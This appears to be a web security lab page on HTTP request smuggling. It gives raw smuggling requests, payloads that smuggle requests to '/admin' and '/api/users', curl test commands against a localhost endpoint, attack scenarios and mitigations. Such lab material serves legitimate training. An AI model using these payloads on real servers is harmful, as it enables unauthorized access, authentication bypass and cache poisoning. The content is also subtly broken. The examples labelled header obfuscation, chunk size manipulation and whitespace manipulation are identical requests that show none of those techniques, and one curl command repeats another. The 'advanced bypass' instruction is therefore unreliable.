Lab 5: Advanced Bypass Techniques - HTTP Request Smuggling

Difficulty: High

Lab Overview

This lab demonstrates advanced HTTP Request Smuggling techniques used to bypass modern protections and security controls. These techniques include header obfuscation, chunk size manipulation, whitespace manipulation, and other sophisticated bypass methods.

Objective: Use advanced bypass techniques to smuggle requests past modern security protections.

Advanced Bypass Techniques

// Advanced Bypass Techniques

// 1. Header Obfuscation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 2. Chunk Size Manipulation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 3. Whitespace Manipulation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 4. Multiple Transfer-Encoding Headers
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Transfer-Encoding: identity
Content-Length: 3

0

SMUGGLED

Advanced Bypass Tester

Test Payloads:

0\r\n\r\nSMUGGLED - Basic bypass
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API access

Vulnerability Details

Type: HTTP Request Smuggling (Advanced Bypass)
Severity: Critical
Method: POST
Issue: Advanced bypass techniques for modern protections

Test Payloads

Try these payloads in the request body:

0\r\n\r\nSMUGGLED
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin

Manual Testing with curl

Use these curl commands to test the vulnerability:

# Basic bypass
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

# Header obfuscation
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

# Multiple Transfer-Encoding headers
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Transfer-Encoding: identity" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

Real-World Attack Scenarios

Bypass modern security controls and protections
Access internal APIs and sensitive endpoints
Bypass authentication and authorization mechanisms
Session hijacking and user impersonation
Cache poisoning and serving malicious content
Compliance violations and security breaches

Mitigation Strategies

Ensure consistent parsing between frontend and backend servers
Implement strict header validation and sanitization
Use reverse proxies that handle parsing consistently
Implement request validation and sanitization
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and anomalies
Keep security controls updated and patched